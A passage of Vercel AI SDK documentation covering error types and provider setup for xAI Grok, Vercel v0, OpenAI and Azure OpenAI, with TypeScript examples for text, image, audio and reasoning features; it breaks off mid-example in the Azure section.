You can check if an error is an instance of AI_NoSuchProviderError using:

import { NoSuchProviderError } from 'ai';

if (NoSuchProviderError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchToolError description: Learn how to fix AI_NoSuchToolError

AI_NoSuchToolError

This error occurs when a model tries to call an unavailable tool.

Properties

toolName: The name of the tool that was not found
availableTools: Array of available tool names
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoSuchToolError using:

import { NoSuchToolError } from 'ai';

if (NoSuchToolError.isInstance(error)) {
  // Handle the error
}

title: AI_NoTranscriptGeneratedError description: Learn how to fix AI_NoTranscriptGeneratedError

AI_NoTranscriptGeneratedError

This error occurs when no transcript could be generated from the input.

Properties

responses: Array of responses
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoTranscriptGeneratedError using:

import { NoTranscriptGeneratedError } from 'ai';

if (NoTranscriptGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_RetryError description: Learn how to fix AI_RetryError

AI_RetryError

This error occurs when a retry operation fails.

Properties

reason: The reason for the retry failure
lastError: The most recent error that occurred during retries
errors: Array of all errors that occurred during retry attempts
message: The error message

Checking for this Error

You can check if an error is an instance of AI_RetryError using:

import { RetryError } from 'ai';

if (RetryError.isInstance(error)) {
  // Handle the error
}

title: AI_TooManyEmbeddingValuesForCallError description: Learn how to fix AI_TooManyEmbeddingValuesForCallError

AI_TooManyEmbeddingValuesForCallError

This error occurs when too many values are provided in a single embedding call.

Properties

provider: The AI provider name
modelId: The ID of the embedding model
maxEmbeddingsPerCall: The maximum number of embeddings allowed per call
values: The array of values that was provided

Checking for this Error

You can check if an error is an instance of AI_TooManyEmbeddingValuesForCallError using:

import { TooManyEmbeddingValuesForCallError } from 'ai';

if (TooManyEmbeddingValuesForCallError.isInstance(error)) {
  // Handle the error
}

title: ToolCallRepairError description: Learn how to fix AI SDK ToolCallRepairError

ToolCallRepairError

This error occurs when there is a failure while attempting to repair an invalid tool call. This typically happens when the AI attempts to fix either a NoSuchToolError or InvalidToolArgumentsError.

Properties

originalError: The original error that triggered the repair attempt (either NoSuchToolError or InvalidToolArgumentsError)
message: The error message
cause: The underlying error that caused the repair to fail

Checking for this Error

You can check if an error is an instance of ToolCallRepairError using:

import { ToolCallRepairError } from 'ai';

if (ToolCallRepairError.isInstance(error)) {
  // Handle the error
}

title: AI_ToolExecutionError description: Learn how to fix AI_ToolExecutionError

AI_ToolExecutionError

This error occurs when there is a failure during the execution of a tool.

Properties

toolName: The name of the tool that failed
toolArgs: The arguments passed to the tool
toolCallId: The ID of the tool call that failed
message: The error message
cause: The underlying error that caused the tool execution to fail

Checking for this Error

You can check if an error is an instance of AI_ToolExecutionError using:

import { ToolExecutionError } from 'ai';

if (ToolExecutionError.isInstance(error)) {
  // Handle the error
}

title: AI_TypeValidationError description: Learn how to fix AI_TypeValidationError

AI_TypeValidationError

This error occurs when type validation fails.

Properties

value: The value that failed validation
message: The error message including validation details

Checking for this Error

You can check if an error is an instance of AI_TypeValidationError using:

import { TypeValidationError } from 'ai';

if (TypeValidationError.isInstance(error)) {
  // Handle the error
}

title: AI_UnsupportedFunctionalityError description: Learn how to fix AI_UnsupportedFunctionalityError

AI_UnsupportedFunctionalityError

This error occurs when functionality is not unsupported.

Properties

functionality: The name of the unsupported functionality
message: The error message

Checking for this Error

You can check if an error is an instance of AI_UnsupportedFunctionalityError using:

import { UnsupportedFunctionalityError } from 'ai';

if (UnsupportedFunctionalityError.isInstance(error)) {
  // Handle the error
}

title: xAI Grok description: Learn how to use xAI Grok.

xAI Grok Provider

The xAI Grok provider contains language model support for the xAI API.

Setup

The xAI Grok provider is available via the @ai-sdk/xai module. You can install it with

Provider Instance

You can import the default provider instance xai from @ai-sdk/xai:

import { xai } from '@ai-sdk/xai';

If you need a customized setup, you can import createXai from @ai-sdk/xai and create a provider instance with your settings:

import { createXai } from '@ai-sdk/xai';

const xai = createXai({
  apiKey: 'your-api-key',
});

You can use the following optional settings to customize the xAI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.x.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the XAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create xAI models using a provider instance. The first argument is the model id, e.g. grok-beta.

const model = xai('grok-3');

Example

You can use xAI language models to generate text with the generateText function:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: xai('grok-3'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

xAI language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Chat Models

xAI chat models also support some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = xai('grok-3', {
  user: 'test-user', // optional unique user identifier
});

The following optional settings are available for xAI chat models:

user string

A unique identifier representing your end-user, which can help xAI to monitor and detect abuse.

xAI chat models also support some model specific provider options. You can pass them in providerOptions argument:

const model = xai('grok-3');

await generateText({
  model,
  providerOptions: {
    xai: {
      reasoningEffort: 'high',
    },
  },
});

The following optional provider options are available for xAI chat models:

reasoningEffort 'low' | 'medium' | 'high'

Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`grok-3`
`grok-3-fast`
`grok-3-mini`
`grok-3-mini-fast`
`grok-2-1212`
`grok-2-vision-1212`
`grok-beta`
`grok-vision-beta`

Image Models

You can create xAI image models using the .imageModel() factory method. For more on image generation with the AI SDK see generateImage().

import { xai } from '@ai-sdk/xai';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: xai.image('grok-2-image'),
  prompt: 'A futuristic cityscape at sunset',
});

Model-specific options

You can customize the image generation behavior with model-specific settings:

import { xai } from '@ai-sdk/xai';
import { experimental_generateImage as generateImage } from 'ai';

const { images } = await generateImage({
  model: xai.image('grok-2-image', {
    maxImagesPerCall: 5, // Default is 10
  }),
  prompt: 'A futuristic cityscape at sunset',
  n: 2, // Generate 2 images
});

Model Capabilities

Model	Sizes	Notes
`grok-2-image`	1024x768 (default)	xAI's text-to-image generation model, designed to create high-quality images from text prompts. It's trained on a diverse dataset and can generate images across various styles, subjects, and settings.

title: Vercel description: Learn how to use Vercel's v0 models with the AI SDK.

Vercel Provider

The Vercel provider gives you access to the v0 API, designed for building modern web applications. The v0-1.0-md model supports text and image inputs and provides fast streaming responses.

You can create your Vercel API key at v0.dev.

Features

Framework aware completions: Evaluated on modern stacks like Next.js and Vercel
Auto-fix: Identifies and corrects common coding issues during generation
Quick edit: Streams inline edits as they're available
OpenAI compatible: Can be used with any tool or SDK that supports OpenAI's API format
Multimodal: Supports both text and image inputs

Setup

The Vercel provider is available via the @ai-sdk/vercel module. You can install it with:

Provider Instance

You can import the default provider instance vercel from @ai-sdk/vercel:

import { vercel } from '@ai-sdk/vercel';

If you need a customized setup, you can import createVercel from @ai-sdk/vercel and create a provider instance with your settings:

import { createVercel } from '@ai-sdk/vercel';

const vercel = createVercel({
  apiKey: process.env.VERCEL_API_KEY ?? '',
});

You can use the following optional settings to customize the Vercel provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.v0.dev/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the VERCEL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create language models using a provider instance. The first argument is the model ID, for example:

import { vercel } from '@ai-sdk/vercel';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vercel('v0-1.0-md'),
  prompt: 'Create a Next.js AI chatbot',
});

Vercel language models can also be used in the streamText function (see AI SDK Core).

Example with AI SDK

import { generateText } from 'ai';
import { createVercel } from '@ai-sdk/vercel';

const vercel = createVercel({
  baseURL: 'https://api.v0.dev/v1',
  apiKey: process.env.VERCEL_API_KEY,
});

const { text } = await generateText({
  model: vercel('v0-1.0-md'),
  prompt: 'Create a Next.js AI chatbot with authentication',
});

Models

v0-1.0-md

The v0-1.0-md model is the default model served by the v0 API.

Capabilities:

Supports text and image inputs (multimodal)
Supports function/tool calls
Streaming responses with low latency
Optimized for frontend and full-stack web development

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`v0-1.0-md`

title: OpenAI description: Learn how to use the OpenAI provider for the AI SDK.

OpenAI Provider

The OpenAI provider contains language model support for the OpenAI responses, chat, and completion APIs, as well as embedding model support for the OpenAI embeddings API.

Setup

The OpenAI provider is available in the @ai-sdk/openai module. You can install it with

Provider Instance

You can import the default provider instance openai from @ai-sdk/openai:

import { openai } from '@ai-sdk/openai';

If you need a customized setup, you can import createOpenAI from @ai-sdk/openai and create a provider instance with your settings:

import { createOpenAI } from '@ai-sdk/openai';

const openai = createOpenAI({
  // custom settings, e.g.
  compatibility: 'strict', // strict mode, enable when using the OpenAI API
});

You can use the following optional settings to customize the OpenAI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.openai.com/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the OPENAI_API_KEY environment variable.
name string

The provider name. You can set this when using OpenAI compatible providers to change the model provider property. Defaults to openai.
organization string

OpenAI Organization.
project string

OpenAI project.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
compatibility "strict" | "compatible"

OpenAI compatibility mode. Should be set to strict when using the OpenAI API, and compatible when using 3rd party providers. In compatible mode, newer information such as streamOptions are not being sent, resulting in NaN token usage. Defaults to 'compatible'.

Language Models

The OpenAI provider instance is a function that you can invoke to create a language model:

const model = openai('gpt-4-turbo');

It automatically selects the correct API based on the model id. You can also pass additional settings in the second argument:

const model = openai('gpt-4-turbo', {
  // additional settings
});

The available options depend on the API that's automatically chosen for the model (see below). If you want to explicitly select a specific model API, you can use .chat or .completion.

Example

You can use OpenAI language models to generate text with the generateText function:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: openai('gpt-4-turbo'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

OpenAI language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Chat Models

You can create models that call the OpenAI chat API using the .chat() factory method. The first argument is the model id, e.g. gpt-4. The OpenAI chat models support tool calls and some have multi-modal capabilities.

const model = openai.chat('gpt-3.5-turbo');

OpenAI chat models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = openai.chat('gpt-3.5-turbo', {
  logitBias: {
    // optional likelihood for specific tokens
    '50256': -100,
  },
  user: 'test-user', // optional unique user identifier
});

The following optional settings are available for OpenAI chat models:

logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.
useLegacyFunctionCalls boolean

Whether to use legacy function calling. Defaults to false.

Required by some open source inference engines which do not support the tools API. May also provide a workaround for parallelToolCalls resulting in the provider buffering tool calls, which causes streamObject to be non-streaming.

Prefer setting parallelToolCalls: false over this option.
structuredOutputs boolean

Whether to use structured outputs. Defaults to false for normal models, and true for reasoning models.

When enabled, tool calls and object generation will be strict and follow the provided schema.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
downloadImages boolean

Automatically download images and pass the image as data to the model. OpenAI supports image URLs for public models, so this is only needed for private models or when the images are not publicly accessible. Defaults to false.
simulateStreaming boolean

Simulates streaming by using a normal generate call and returning it as a stream. Enable this if the model that you are using does not support streaming. Defaults to false.
reasoningEffort 'low' | 'medium' | 'high'

Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.

Reasoning

OpenAI has introduced the o1,o3, and o4 series of reasoning models. Currently, o4-mini, o3, o3-mini, o1, o1-mini, and o1-preview are available.

Reasoning models currently only generate text, have several limitations, and are only supported using generateText and streamText.

They support additional settings and response metadata:

You can use providerOptions to set
- the reasoningEffort option (or alternatively the reasoningEffort model setting), which determines the amount of reasoning the model performs.
You can use response providerMetadata to access the number of reasoning tokens that the model generated.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai('o3-mini'),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    openai: {
      reasoningEffort: 'low',
    },
  },
});

console.log(text);
console.log('Usage:', {
  ...usage,
  reasoningTokens: providerMetadata?.openai?.reasoningTokens,
});

Structured Outputs

You can enable OpenAI structured outputs by setting the structuredOutputs option to true. Structured outputs are a form of grammar-guided generation. The JSON schema is used as a grammar and the outputs will always conform to the schema.

import { openai } from '@ai-sdk/openai';
import { generateObject } from 'ai';
import { z } from 'zod';

const result = await generateObject({
  model: openai('gpt-4o-2024-08-06', {
    structuredOutputs: true,
  }),
  schemaName: 'recipe',
  schemaDescription: 'A recipe for lasagna.',
  schema: z.object({
    name: z.string(),
    ingredients: z.array(
      z.object({
        name: z.string(),
        amount: z.string(),
      }),
    ),
    steps: z.array(z.string()),
  }),
  prompt: 'Generate a lasagna recipe.',
});

console.log(JSON.stringify(result.object, null, 2));

For example, optional schema properties are not supported. You need to change Zod .nullish() and .optional() to .nullable().

PDF support

The OpenAI Chat API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: openai('gpt-4o'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mimeType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

The model will have access to the contents of the PDF file and respond to questions about it. The PDF file should be passed using the data field, and the mimeType should be set to 'application/pdf'.

Predicted Outputs

OpenAI supports predicted outputs for gpt-4o and gpt-4o-mini. Predicted outputs help you reduce latency by allowing you to specify a base text that the model should modify. You can enable predicted outputs by adding the prediction option to the providerOptions.openai object:

const result = streamText({
  model: openai('gpt-4o'),
  messages: [
    {
      role: 'user',
      content: 'Replace the Username property with an Email property.',
    },
    {
      role: 'user',
      content: existingCode,
    },
  ],
  providerOptions: {
    openai: {
      prediction: {
        type: 'content',
        content: existingCode,
      },
    },
  },
});

OpenAI provides usage information for predicted outputs (acceptedPredictionTokens and rejectedPredictionTokens). You can access it in the providerMetadata object.

const openaiMetadata = (await result.providerMetadata)?.openai;

const acceptedPredictionTokens = openaiMetadata?.acceptedPredictionTokens;
const rejectedPredictionTokens = openaiMetadata?.rejectedPredictionTokens;

Image Detail

You can use the openai provider option to set the image input detail to high, low, or auto:

const result = await generateText({
  model: openai('gpt-4o'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe the image in detail.' },
        {
          type: 'image',
          image:
            'https://github.com/vercel/ai/blob/main/examples/ai-core/data/comic-cat.png?raw=true',

          // OpenAI specific options - image detail:
          providerOptions: {
            openai: { imageDetail: 'low' },
          },
        },
      ],
    },
  ],
});

Distillation

OpenAI supports model distillation for some models. If you want to store a generation for use in the distillation process, you can add the store option to the providerOptions.openai object. This will save the generation to the OpenAI platform for later use in distillation.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
import 'dotenv/config';

async function main() {
  const { text, usage } = await generateText({
    model: openai('gpt-4o-mini'),
    prompt: 'Who worked on the original macintosh?',
    providerOptions: {
      openai: {
        store: true,
        metadata: {
          custom: 'value',
        },
      },
    },
  });

  console.log(text);
  console.log();
  console.log('Usage:', usage);
}

main().catch(console.error);

Prompt Caching

OpenAI has introduced Prompt Caching for supported models including gpt-4o, gpt-4o-mini, o1-preview, and o1-mini.

Prompt caching is automatically enabled for these models, when the prompt is 1024 tokens or longer. It does not need to be explicitly enabled.
You can use response providerMetadata to access the number of prompt tokens that were a cache hit.
Note that caching behavior is dependent on load on OpenAI's infrastructure. Prompt prefixes generally remain in the cache following 5-10 minutes of inactivity before they are evicted, but during off-peak periods they may persist for up to an hour.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai('gpt-4o-mini'),
  prompt: `A 1024-token or longer prompt...`,
});

console.log(`usage:`, {
  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

Audio Input

With the gpt-4o-audio-preview model, you can pass audio files to the model.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4o-audio-preview'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What is the audio saying?' },
        {
          type: 'file',
          mimeType: 'audio/mpeg',
          data: fs.readFileSync('./data/galileo.mp3'),
        },
      ],
    },
  ],
});

Responses Models

You can use the OpenAI responses API with the openai.responses(modelId) factory method.

const model = openai.responses('gpt-4o-mini');

Further configuration can be done using OpenAI provider options. You can validate the provider options using the OpenAIResponsesProviderOptions type.

import { openai, OpenAIResponsesProviderOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  providerOptions: {
    openai: {
      parallelToolCalls: false,
      store: false,
      user: 'user_123',
      // ...
    } satisfies OpenAIResponsesProviderOptions,
  },
  // ...
});

The following provider options are available:

parallelToolCalls boolean Whether to use parallel tool calls. Defaults to true.
store boolean Whether to store the generation. Defaults to true.
metadata Record<string, string> Additional metadata to store with the generation.
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
reasoningEffort 'low' | 'medium' | 'high' Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
reasoningSummary 'auto' | 'detailed' Controls whether the model returns its reasoning process. Set to 'auto' for a condensed summary, 'detailed' for more comprehensive reasoning. Defaults to undefined (no reasoning summaries). When enabled, reasoning summaries appear in the stream as events with type 'reasoning' and in non-streaming responses within the reasoning field.
strictSchemas boolean Whether to use strict JSON schemas in tools and when generating JSON outputs. Defaults to true.

The OpenAI responses provider also returns provider-specific metadata:

const { providerMetadata } = await generateText({
  model: openai.responses('gpt-4o-mini'),
});

const openaiMetadata = providerMetadata?.openai;

The following OpenAI-specific metadata is returned:

responseId string The ID of the response. Can be used to continue a conversation.
cachedPromptTokens number The number of prompt tokens that were a cache hit.
reasoningTokens number The number of reasoning tokens that the model generated.

Web Search

The OpenAI responses provider supports web search through the openai.tools.webSearchPreview tool.

You can force the use of the web search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'web_search_preview' }.

const result = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search_preview: openai.tools.webSearchPreview({
      // optional configuration:
      searchContextSize: 'high',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
    }),
  },
  // Force web search tool:
  toolChoice: { type: 'tool', toolName: 'web_search_preview' },
});

// URL sources
const sources = result.sources;

Reasoning Summaries

For reasoning models like o3-mini, o3, and o4-mini, you can enable reasoning summaries to see the model's thought process. Different models support different summarizers—for example, o4-mini supports detailed summaries. Set reasoningSummary: "auto" to automatically receive the richest level available.

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai.responses('o4-mini'),
  prompt: 'Tell me about the Mission burrito debate in San Francisco.',
  providerOptions: {
    openai: {
      reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
    },
  },
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log(`Reasoning: ${part.textDelta}`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

For non-streaming calls with generateText, the reasoning summaries are available in the reasoning field of the response:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('o3-mini'),
  prompt: 'Tell me about the Mission burrito debate in San Francisco.',
  providerOptions: {
    openai: {
      reasoningSummary: 'auto',
    },
  },
});
console.log('Reasoning:', result.reasoning);

Learn more about reasoning summaries in the OpenAI documentation.

PDF support

The OpenAI Responses API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: openai.responses('gpt-4o'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mimeType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

Structured Outputs

The OpenAI Responses API supports structured outputs. You can enforce structured outputs using generateObject or streamObject, which expose a schema option. Additionally, you can pass a Zod or JSON Schema object to the experimental_output option when using generateText or streamText.

// Using generateObject
const result = await generateObject({
  model: openai.responses('gpt-4.1'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(
        z.object({
          name: z.string(),
          amount: z.string(),
        }),
      ),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

// Using generateText
const result = await generateText({
  model: openai.responses('gpt-4.1'),
  prompt: 'How do I make a pizza?',
  experimental_output: Output.object({
    schema: z.object({
      ingredients: z.array(z.string()),
      steps: z.array(z.string()),
    }),
  }),
});

Completion Models

You can create models that call the OpenAI completions API using the .completion() factory method. The first argument is the model id. Currently only gpt-3.5-turbo-instruct is supported.

const model = openai.completion('gpt-3.5-turbo-instruct');

OpenAI completion models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = openai.completion('gpt-3.5-turbo-instruct', {
  echo: true, // optional, echo the prompt in addition to the completion
  logitBias: {
    // optional likelihood for specific tokens
    '50256': -100,
  },
  suffix: 'some text', // optional suffix that comes after a completion of inserted text
  user: 'test-user', // optional unique user identifier
});

The following optional settings are available for OpenAI completion models:

echo: boolean

Echo back the prompt in addition to the completion.
logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Model Capabilities

Model	Image Input	Audio Input	Object Generation	Tool Usage
`gpt-4.1`
`gpt-4.1-mini`
`gpt-4.1-nano`
`gpt-4o`
`gpt-4o-mini`
`gpt-4o-audio-preview`
`gpt-4-turbo`
`gpt-4`
`gpt-3.5-turbo`
`o1`
`o1-mini`
`o1-preview`
`o3-mini`
`o3`
`o4-mini`
`chatgpt-4o-latest`
`gpt-5`
`gpt-5-mini`
`gpt-5-nano`

Embedding Models

You can create models that call the OpenAI embeddings API using the .embedding() factory method.

const model = openai.embedding('text-embedding-3-large');

OpenAI embedding models support several additional settings. You can pass them as an options argument:

const model = openai.embedding('text-embedding-3-large', {
  dimensions: 512 // optional, number of dimensions for the embedding
  user: 'test-user' // optional unique user identifier
})

The following optional settings are available for OpenAI embedding models:

dimensions: number

The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Model Capabilities

Model	Default Dimensions	Custom Dimensions
`text-embedding-3-large`	3072
`text-embedding-3-small`	1536
`text-embedding-ada-002`	1536

Image Models

You can create models that call the OpenAI image generation API using the .image() factory method.

const model = openai.image('dall-e-3');

Model Capabilities

Model	Sizes
`gpt-image-1`	1024x1024, 1536x1024, 1024x1536
`dall-e-3`	1024x1024, 1792x1024, 1024x1792
`dall-e-2`	256x256, 512x512, 1024x1024

You can pass optional providerOptions to the image model. These are prone to change by OpenAI and are model dependent. For example, the gpt-image-1 model supports the quality option:

const { image } = await generateImage({
  model: openai.image('gpt-image-1'),
  prompt: 'A salamander at sunrise in a forest pond in the Seychelles.',
  providerOptions: {
    openai: { quality: 'high' },
  },
});

For more on generateImage() see Image Generation.

For more information on the available OpenAI image model options, see the OpenAI API reference.

Transcription Models

You can create models that call the OpenAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-1.

const model = openai.transcription('whisper-1');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new Uint8Array([1, 2, 3, 4]),
  providerOptions: { openai: { language: 'en' } },
});

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
include string[] Additional information to include in the transcription response.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-1`
`gpt-4o-mini-transcribe`
`gpt-4o-transcribe`

Speech Models

You can create models that call the OpenAI speech API using the .speech() factory method.

The first argument is the model id e.g. tts-1.

const model = openai.speech('tts-1');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  providerOptions: { openai: {} },
});

instructions string Control the voice of your generated audio with additional instructions e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
response_format string The format to audio in. Supported formats are mp3, opus, aac, flac, wav, and pcm. Defaults to mp3. Optional.
speed number The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.

Model Capabilities

Model	Instructions
`tts-1`
`tts-1-hd`
`gpt-4o-mini-tts`

title: Azure OpenAI description: Learn how to use the Azure OpenAI provider for the AI SDK.

Azure OpenAI Provider

The Azure OpenAI provider contains language model support for the Azure OpenAI chat API.

Setup

The Azure OpenAI provider is available in the @ai-sdk/azure module. You can install it with

Provider Instance

You can import the default provider instance azure from @ai-sdk/azure:

import { azure } from '@ai-sdk/azure';

If you need a customized setup, you can import createAzure from @ai-sdk/azure and create a provider instance with your settings:

import { createAzure } from '@ai-sdk/azure';

const azure = createAzure({
  resourceName: 'your-resource-name', // Azure resource name
  apiKey: 'your-api-key',
});

You can use the following optional settings to customize the OpenAI provider instance:

resourceName string

Azure resource name. It defaults to the AZURE_RESOURCE_NAME environment variable.

The resource name is used in the assembled URL: https://{resourceName}.openai.azure.com/openai/deployments/{modelId}{path}. You can use baseURL instead to specify the URL prefix.
apiKey string

API key that is being sent using the api-key header. It defaults to the AZURE_API_KEY environment variable.
apiVersion string

Sets a custom api version. Defaults to 2024-10-01-preview.
baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers.

Either this or resourceName can be used. When a baseURL is provided, the resourceName is ignored.

With a baseURL, the resolved URL is {baseURL}/{modelId}{path}.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

The Azure OpenAI provider instance is a function that you can invoke to create a language model:

const model = azure('your-deployment-name');

You need to pass your deployment name as the first argument.

Reasoning Models

Azure exposes the thinking of DeepSeek-R1 in the generated text using the <think> tag. You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:

import { azure } from '@ai-sdk/azure';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: azure('your-deepseek-r1-deployment-name'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use OpenAI language models to generate text with the generateText function:

import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';

const { text } = await generateText({
